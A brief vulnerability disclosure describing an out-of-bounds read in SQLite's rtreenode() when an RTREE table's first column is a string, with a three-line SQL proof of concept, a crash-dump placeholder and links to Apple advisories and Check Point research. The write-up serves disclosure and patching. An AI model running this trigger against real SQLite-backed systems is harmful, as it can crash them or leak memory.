Information

RTREE virtual tables, used for geographical indexing, are expected to begin with an integer column. Therefore, other RTREE interfaces expect the first column in an RTREE to be an integer. However, if we create a table where the first column is a string, as shown in the figure below, and pass it to the rtreenode() interface, an OOB read occurs.

Crash Dump:

Crash Dump

PoC:

CREATE VIRTUAL TABLE rtree USING rtree(a, b, c);
INSERT INTO rtree VALUES(“not an int”, 1, 2)’
SELECT rtreenode(2, a) FROM rtree;

Attachments:
Crash.png

References:
https://support.apple.com/en-us/HT210118
https://support.apple.com/en-us/HT210119
https://research.checkpoint.com/select-code_execution-from-using-sqlite/